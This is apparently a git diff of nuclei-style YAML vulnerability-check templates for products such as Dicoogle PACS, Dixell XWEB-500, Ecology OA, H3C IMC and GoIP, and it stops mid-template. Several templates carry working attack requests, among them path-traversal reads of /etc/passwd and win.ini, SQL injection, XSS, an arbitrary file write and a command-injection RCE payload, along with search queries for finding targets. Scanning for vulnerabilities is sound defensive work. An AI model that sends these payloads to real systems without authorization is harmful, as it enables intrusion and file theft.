0000000000..84da5d8927 --- /dev/null +++ b/vulnerabilities/other/dicoogle-pacs-lfi.yaml @@ -0,0 +1,25 @@ +id: dicoogle-pacs-lfi + +info: + name: Dicoogle PACS 2.5.0 - Directory Traversal + author: 0x_akoko + severity: high + description: In version 2.5.0, it is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials aren't required. + reference: + - https://cxsecurity.com/issue/WLB-2018070131 + - http://www.dicoogle.com/home + tags: windows,lfi,dicoogle + +requests: + - method: GET + path: + - "{{BaseURL}}/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini" + + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and diff --git a/vulnerabilities/other/dixell-xweb500-filewrite.yaml b/vulnerabilities/other/dixell-xweb500-filewrite.yaml new file mode 100644 index 0000000000..5cfb5554ca --- /dev/null +++ b/vulnerabilities/other/dixell-xweb500-filewrite.yaml @@ -0,0 +1,36 @@ +id: dixell-xweb500-filewrite + +info: + name: Dixell XWEB-500 - Arbitrary File Write + author: hackerarpan + severity: critical + reference: + - https://www.exploit-db.com/exploits/50639 + metadata: + google-dork: inurl:"xweb500.cgi" + tags: lfw,iot,dixell,xweb500 + +requests: + - raw: + - | + POST /cgi-bin/logo_extra_upload.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/octet-stream + + {{randstr}}.txt + dixell-xweb500-filewrite + + - | + GET /logo/{{randstr}}.txt HTTP/1.1 + Host: {{Hostname}} + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(body_2, "dixell-xweb500-filewrite")' + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/dlink-850L-info-leak.yaml b/vulnerabilities/other/dlink-850L-info-leak.yaml index 6d3d77235f..72ba853f9f 100644 --- a/vulnerabilities/other/dlink-850L-info-leak.yaml +++ b/vulnerabilities/other/dlink-850L-info-leak.yaml @@ -4,7 +4,8 @@ info: name: Dlink Dir-850L Info Leak author: pikpikcu severity: info - reference: https://xz.aliyun.com/t/2941 + reference: + - https://xz.aliyun.com/t/2941 tags: dlink requests: diff --git a/vulnerabilities/other/dss-download-fileread.yaml b/vulnerabilities/other/dss-download-fileread.yaml new file mode 100644 index 0000000000..732b472466 --- /dev/null +++ b/vulnerabilities/other/dss-download-fileread.yaml @@ -0,0 +1,24 @@ +id: dss-download-fileread + +info: + name: DSS Download File Read + author: ritikchaddha + severity: high + tags: lfi,dss,lfr + +requests: + - method: GET + path: + - "{{BaseURL}}/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/duomicms-sql-injection.yaml b/vulnerabilities/other/duomicms-sql-injection.yaml index 93da2eb742..4b5cbee41c 100644 --- a/vulnerabilities/other/duomicms-sql-injection.yaml +++ b/vulnerabilities/other/duomicms-sql-injection.yaml @@ -4,7 +4,8 @@ info: name: DuomiCMS SQL Injection author: pikpikcu severity: high - reference: https://redn3ck.github.io/2016/11/01/duomiCMS/ + reference: + - https://redn3ck.github.io/2016/11/01/duomiCMS/ tags: duomicms,sqli requests: diff --git a/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml b/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml index 3ebe236378..61101d9fa7 100644 --- a/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml +++ b/vulnerabilities/other/ecology-filedownload-directory-traversal.yaml @@ -1,8 +1,11 @@ id: ecology-filedownload-directory-traversal + info: name: Ecology Directory Traversal author: princechaddha severity: medium + metadata: + fofa-query: app="泛微-协同办公OA" tags: ecology,lfi requests: diff --git a/vulnerabilities/other/ecology-springframework-directory-traversal.yaml b/vulnerabilities/other/ecology-springframework-directory-traversal.yaml index 54317204ee..38a7c94887 100644 --- a/vulnerabilities/other/ecology-springframework-directory-traversal.yaml +++ b/vulnerabilities/other/ecology-springframework-directory-traversal.yaml @@ -1,4 +1,5 @@ id: ecology-springframework-directory-traversal + info: name: Ecology Springframework Directory Traversal author: princechaddha diff --git a/vulnerabilities/other/ecology-syncuserinfo-sqli.yaml b/vulnerabilities/other/ecology-syncuserinfo-sqli.yaml new file mode 100644 index 0000000000..7039f82f5c --- /dev/null +++ b/vulnerabilities/other/ecology-syncuserinfo-sqli.yaml @@ -0,0 +1,30 @@ +id: ecology-syncuserinfo-sqli + +info: + name: Ecology Syncuserinfo Sqli + author: ritikchaddha + severity: high + reference: + - https://www.weaver.com.cn/ + metadata: + fofa-query: app="泛微-协同办公OA" + tags: ecology,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/mobile/plugin/SyncUserInfo.jsp?userIdentifiers=-1)union(select(3),null,null,null,null,null,str(98989*44313),null" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "4386499557" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/ecology-v8-sqli.yaml b/vulnerabilities/other/ecology-v8-sqli.yaml new file mode 100644 index 0000000000..5279e14a6f --- /dev/null +++ b/vulnerabilities/other/ecology-v8-sqli.yaml @@ -0,0 +1,27 @@ +id: ecology-v8-sqli + +info: + name: Ecology V8 - SQL Injection + author: ritikchaddha + severity: high + reference: + - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20V8%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html + metadata: + fofa-query: app="泛微-协同办公OA" + tags: ecology,sqli + +requests: + - method: GET + path: + - "{{BaseURL}}/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select+547653*865674+as+id" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "474088963122" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/ecsimagingpacs-rce.yaml b/vulnerabilities/other/ecsimagingpacs-rce.yaml new file mode 100644 index 0000000000..115478ee95 --- /dev/null +++ b/vulnerabilities/other/ecsimagingpacs-rce.yaml @@ -0,0 +1,30 @@ +id: ecsimagingpacs-rce + +info: + name: ECSIMAGING PACS <= 6.21.5 - Command Execution and Local File Inclusion + author: ritikchaddha + severity: critical + description: ECSIMAGING PACS Application 6.21.5 and below suffer from a command injection vulnerability and a local file include vulnerability. The 'file' parameter on the page /showfile.php can be exploited to perform command execution or local file inclusion. Often on ECSIMAGING PACS, the www-data user has sudo NOPASSWD access. + reference: https://www.exploit-db.com/exploits/49388 + metadata: + verified: false + tags: ecsimagingpacs,rce + classification: + cwe-id: CWE-78 + +requests: + - method: GET + path: + - "{{BaseURL}}/showfile.php?file=/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by cs 05/12/2022 diff --git a/vulnerabilities/other/eibiz-lfi.yaml b/vulnerabilities/other/eibiz-lfi.yaml index d52df2905e..5ba1f5f9d8 100644 --- a/vulnerabilities/other/eibiz-lfi.yaml +++ b/vulnerabilities/other/eibiz-lfi.yaml @@ -5,7 +5,8 @@ info: author: 0x_akoko severity: high description: An unauthenticated remote attacker can exploit this to view the contents of files located outside of the server's root directory. The issue can be triggered through the oldfile GET parameter. - reference: https://packetstormsecurity.com/files/158943/Eibiz-i-Media-Server-Digital-Signage-3.8.0-File-Path-Traversal.html + reference: + - https://packetstormsecurity.com/files/158943/Eibiz-i-Media-Server-Digital-Signage-3.8.0-File-Path-Traversal.html tags: windows,lfi,eibiz requests: diff --git a/vulnerabilities/other/empirecms-xss.yaml b/vulnerabilities/other/empirecms-xss.yaml index 9ccb638846..edc848b882 100644 --- a/vulnerabilities/other/empirecms-xss.yaml +++ b/vulnerabilities/other/empirecms-xss.yaml @@ -4,10 +4,10 @@ info: name: EmpireCMS v75 XSS author: pikpikcu severity: medium - reference: https://www.geek-share.com/detail/2777280260.html + reference: + - https://www.geek-share.com/detail/2777280260.html tags: empirecms,xss - requests: - method: GET path: diff --git a/vulnerabilities/other/erp-nc-directory-traversal.yaml b/vulnerabilities/other/erp-nc-directory-traversal.yaml index c5d6ef641e..1bbf80ae2c 100644 --- a/vulnerabilities/other/erp-nc-directory-traversal.yaml +++ b/vulnerabilities/other/erp-nc-directory-traversal.yaml @@ -4,7 +4,8 @@ info: name: ERP-NC directory traversal author: pikpikcu severity: high - reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g + reference: + - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g tags: lfi,erp-nc requests: diff --git a/vulnerabilities/other/etouch-v2-sqli.yaml b/vulnerabilities/other/etouch-v2-sqli.yaml index 963398de58..4983e47bcb 100644 --- a/vulnerabilities/other/etouch-v2-sqli.yaml +++ b/vulnerabilities/other/etouch-v2-sqli.yaml @@ -1,12 +1,13 @@ id: etouch-v2-sqli + info: name: Ectouch v2 SQL Injection author: princechaddha severity: high - tags: etouch,sqli reference: - https://github.com/mstxq17/CodeCheck/ - https://www.anquanke.com/post/id/168991 + tags: etouch,sqli requests: - method: GET diff --git a/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml b/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml index 60ae8e5789..d52ba57f9e 100644 --- a/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml +++ b/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml @@ -5,7 +5,8 @@ info: author: pikpikcu severity: high description: A vulnerability in EWEBS's 'casmain.xgi' endpoint allows remote attackers to disclose the content of locally stored files via the 'Language_S' parameter. - reference: http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%9E%81%E9%80%9AEWEBS/%E6%9E%81%E9%80%9AEWEBS%20casmain.xgi%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html + reference: + - http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%9E%81%E9%80%9AEWEBS/%E6%9E%81%E9%80%9AEWEBS%20casmain.xgi%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html tags: ewebs,lfi requests: diff --git a/vulnerabilities/other/eyelock-nano-lfd.yaml b/vulnerabilities/other/eyelock-nano-lfd.yaml index c6c41baad6..483437d4b9 100644 --- a/vulnerabilities/other/eyelock-nano-lfd.yaml +++ b/vulnerabilities/other/eyelock-nano-lfd.yaml @@ -1,11 +1,13 @@ id: eyelock-nano-lfd info: - name: EyeLock nano NXT 3.5 - Local File Disclosure + name: EyeLock nano NXT 3.5 - Arbitrary File Retrieval author: geeknik severity: high - description: nano NXT suffers from a file disclosure vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This can be exploited to disclose contents of files from local resources. - reference: https://www.zeroscience.mk/codes/eyelock_lfd.txt + description: EyeLock nano NXT suffers from a file retrieval vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This + can be exploited to disclose contents of files from local resources. + reference: + - https://www.zeroscience.mk/codes/eyelock_lfd.txt tags: iot,lfi,eyelock requests: @@ -22,3 +24,5 @@ requests: regex: - "root:[x*]:0:0:" part: body + +# Enhanced by mp on 2022/04/08 diff --git a/vulnerabilities/other/eyou-email-rce.yaml b/vulnerabilities/other/eyou-email-rce.yaml index 37cae61ecc..fe580099c6 100644 --- a/vulnerabilities/other/eyou-email-rce.yaml +++ b/vulnerabilities/other/eyou-email-rce.yaml @@ -4,7 +4,8 @@ info: name: eYou E-Mail system RCE author: pikpikcu severity: critical - reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g + reference: + - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g tags: rce,eyou requests: @@ -20,7 +21,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" part: body - type: status diff --git a/vulnerabilities/other/fanruanoa2012-disclosure.yaml b/vulnerabilities/other/fanruanoa2012-disclosure.yaml index 56db1cbc60..5bff441836 100644 --- a/vulnerabilities/other/fanruanoa2012-disclosure.yaml +++ b/vulnerabilities/other/fanruanoa2012-disclosure.yaml @@ -3,10 +3,11 @@ id: fanruanoa2012-disclosure info: name: Fanruan Report 2012 Information Disclosure author: YanYun - description: Fanruan Report 2012 has an information disclosure vulnerability, and some sensitive information can be obtained by accessing a specific URL severity: high + description: Fanruan Report 2012 has an information disclosure vulnerability, and some sensitive information can be obtained by accessing a specific URL + reference: + - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%202012%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html tags: oa,java,fanruan,disclosure - reference: http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%202012%20%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E.html requests: - method: GET diff --git a/vulnerabilities/other/fatpipe-auth-bypass.yaml b/vulnerabilities/other/fatpipe-auth-bypass.yaml index ff03381af1..cf2b04c028 100644 --- a/vulnerabilities/other/fatpipe-auth-bypass.yaml +++ b/vulnerabilities/other/fatpipe-auth-bypass.yaml @@ -4,7 +4,8 @@ info: name: FatPipe Networks WARP 10.2.2 Authorization Bypass author: gy741 severity: high - description: Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources behind protected pages. + description: Improper access control occurs when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources + behind protected pages. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5682.php - https://www.fatpipeinc.com/support/advisories.php diff --git a/vulnerabilities/other/feifeicms-lfr.yaml b/vulnerabilities/other/feifeicms-lfr.yaml index 783816ccf2..4a074e68dc 100644 --- a/vulnerabilities/other/feifeicms-lfr.yaml +++ b/vulnerabilities/other/feifeicms-lfr.yaml @@ -1,12 +1,13 @@ id: feifeicms-lfr + info: name: FeiFeiCms Local File Read author: princechaddha severity: high - tags: feifeicms,lfi reference: - https://www.cnblogs.com/jinqi520/p/10202615.html - https://gitee.com/daicuo/feifeicms + tags: feifeicms,lfi requests: - method: GET diff --git a/vulnerabilities/other/finereport-path-traversal.yaml b/vulnerabilities/other/finereport-path-traversal.yaml index fb923ced76..0ebcfd9014 100644 --- a/vulnerabilities/other/finereport-path-traversal.yaml +++ b/vulnerabilities/other/finereport-path-traversal.yaml @@ -4,7 +4,8 @@ info: name: FineReport 8.0 Path Traversal author: pikpikcu severity: medium - reference: http://foreversong.cn/archives/1378 + reference: + - http://foreversong.cn/archives/1378 tags: finereport,lfi requests: diff --git a/vulnerabilities/other/flir-path-traversal.yaml b/vulnerabilities/other/flir-path-traversal.yaml index 596e30a0de..6564db13b2 100644 --- a/vulnerabilities/other/flir-path-traversal.yaml +++ b/vulnerabilities/other/flir-path-traversal.yaml @@ -4,7 +4,8 @@ info: name: Flir Path Traversal author: pikpikcu severity: high - reference: https://juejin.cn/post/6961370156484263972 + reference: + - https://juejin.cn/post/6961370156484263972 tags: flir,lfi requests: @@ -17,7 +18,7 @@ requests: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" condition: and - type: status diff --git a/vulnerabilities/other/geovision-geowebserver-lfi.yaml b/vulnerabilities/other/geovision-geowebserver-lfi.yaml index c0e7dbfcad..08261363a2 100644 --- a/vulnerabilities/other/geovision-geowebserver-lfi.yaml +++ b/vulnerabilities/other/geovision-geowebserver-lfi.yaml @@ -5,7 +5,8 @@ info: author: madrobot severity: high description: A vulnerability in GeoVision Geowebserver allows remote unauthenticated attackers to disclose the content of locally stored files. - reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt + reference: + - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt tags: geowebserver,lfi requests: diff --git a/vulnerabilities/other/geovision-geowebserver-xss.yaml b/vulnerabilities/other/geovision-geowebserver-xss.yaml index a047ed5e8b..48221d3663 100644 --- a/vulnerabilities/other/geovision-geowebserver-xss.yaml +++ b/vulnerabilities/other/geovision-geowebserver-xss.yaml @@ -5,7 +5,8 @@ info: author: madrobot severity: medium description: GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests. - reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt + reference: + - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt tags: geowebserver,xss requests: diff --git a/vulnerabilities/other/global-domains-lfi.yaml b/vulnerabilities/other/global-domains-lfi.yaml new file mode 100644 index 0000000000..a7d542d48b --- /dev/null +++ b/vulnerabilities/other/global-domains-lfi.yaml @@ -0,0 +1,25 @@ +id: global-domains-lfi + +info: + name: Global Domains International Directory traversal Vulnerability + author: 0x_Akoko + severity: high + reference: + - https://cxsecurity.com/issue/WLB-2018020247 + - http://www.nic.ws + tags: globaldomains,lfi,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/global-domains-xss.yaml b/vulnerabilities/other/global-domains-xss.yaml new file mode 100644 index 0000000000..c842000e15 --- /dev/null +++ b/vulnerabilities/other/global-domains-xss.yaml @@ -0,0 +1,30 @@ +id: global-domains-xss + +info: + name: Global Domains International XSS + author: princechaddha + severity: medium + reference: + - https://cxsecurity.com/issue/WLB-2018020247 + tags: globaldomains,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/gnuboard-sms-xss.yaml b/vulnerabilities/other/gnuboard-sms-xss.yaml new file mode 100644 index 0000000000..155dea7f7d --- /dev/null +++ b/vulnerabilities/other/gnuboard-sms-xss.yaml @@ -0,0 +1,35 @@ +id: gnuboard-sms-xss + +info: + name: Gnuboard CMS - SMS Emoticon XSS + author: gy741 + severity: medium + description: A vulnerability in Gnuboard CMS allows remote attackers to inject arbitrary Javascript into the responses returned by the server. + reference: + - https://sir.kr/g5_pds/4788?page=5 + - https://github.com/gnuboard/gnuboard5/commit/8182cac90d2ee2f9da06469ecba759170e782ee3 + metadata: + verified: true + shodan-query: http.html:"Gnuboard" + tags: xss,gnuboard + +requests: + - method: GET + path: + - "{{BaseURL}}/plugin/sms5/ajax.sms_emoticon.php?arr_ajax_msg=gnuboard" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"0nuboard"' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/goip-1-lfi.yaml b/vulnerabilities/other/goip-1-lfi.yaml new file mode 100644 index 0000000000..6070b4dcc9 --- /dev/null +++ b/vulnerabilities/other/goip-1-lfi.yaml @@ -0,0 +1,24 @@ +id: goip-1-lfi + +info: + name: GoIP-1 GSM - Local File Inclusion + author: gy741 + severity: high + description: Input passed thru the 'content' or 'sidebar' GET parameter in 'frame.html' or 'frame.A100.html' not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker + to read arbitrary files on the affected system. + reference: + - https://shufflingbytes.com/posts/hacking-goip-gsm-gateway/ + - http://www.hybertone.com/uploadfile/download/20140304125509964.pdf + - http://en.dbltek.com/latestfirmwares.html + tags: gsm,goip,lfi,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + - "{{BaseURL}}/default/en_US/frame.A100.html?sidebar=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + + matchers: + - type: regex + regex: + - "root:.*:0:0:" diff --git a/vulnerabilities/other/groupoffice-lfi.yaml b/vulnerabilities/other/groupoffice-lfi.yaml new file mode 100644 index 0000000000..142e511ab2 --- /dev/null +++ b/vulnerabilities/other/groupoffice-lfi.yaml @@ -0,0 +1,26 @@ +id: groupoffice-lfi + +info: + name: Groupoffice 3.4.21 Directory Traversal Vulnerability + author: 0x_Akoko + severity: high + reference: + - https://cxsecurity.com/issue/WLB-2018020249 + - http://www.group-office.com + tags: groupoffice,lfi,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/compress.php?file=../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/vulnerabilities/other/gsoap-lfi.yaml b/vulnerabilities/other/gsoap-lfi.yaml index e679dee126..fd296bca72 100644 --- a/vulnerabilities/other/gsoap-lfi.yaml +++ b/vulnerabilities/other/gsoap-lfi.yaml @@ -4,7 +4,8 @@ info: name: gSOAP 2.8 - Directory Traversal author: 0x_Akoko severity: high - reference: https://www.exploit-db.com/exploits/47653 + reference: + - https://www.exploit-db.com/exploits/47653 tags: gsoap,lfi requests: diff --git a/vulnerabilities/other/h3c-imc-rce.yaml b/vulnerabilities/other/h3c-imc-rce.yaml index 2c0133a076..7448e95f74 100644 --- a/vulnerabilities/other/h3c-imc-rce.yaml +++ b/vulnerabilities/other/h3c-imc-rce.yaml @@ -5,22 +5,35 @@ info: author: pikpikcu severity: critical description: A vulnerability in H3C IMC allows remote unauthenticated attackers to cause the remote web application to execute arbitrary commands via the 'dynamiccontent.properties.xhtml' endpoint - reference: https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw + reference: + - https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw + metadata: + fofa-query: body="/imc/javax.faces.resource/images/login_help.png.jsf?ln=primefaces-imc-new-webui" tags: rce,h3c-imc requests: - - method: POST - path: - - "{{BaseURL}}/imc/javax.faces.resource/dynamiccontent.properties.xhtml" - body: | - pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=cat%20/etc/passwd + - raw: + - | + POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd={{command}} + + payloads: + command: + - 'cat /etc/passwd' + - 'type C:\\Windows\\win.ini' + + stop-at-first-match: true matchers-condition: and matchers: - - type: regex + part: body regex: - - "root:.*:0:0" + - "root:.*:0:0:" + - "\\[(font|extension|file)s\\]" + condition: or - type: status status: diff --git a/vulnerabilities/other/hanming-lfr.yaml b/vulnerabilities/other/hanming-lfr.yaml new file mode 100644 index 0000000000..9a90adea5b --- /dev/null +++ b/vulnerabilities/other/hanming-lfr.yaml @@ -0,0 +1,30 @@ +id: hanming-lfr + +info: + name: Hanming Video Conferencing File Read + author: ritikchaddha + severity: high + reference: + - https://mp.weixin.qq.com/s/F-M21PT0xn9QOuwoC8llKA + tags: lfr,hanming,lfi + +requests: + - method: GET + path: + - 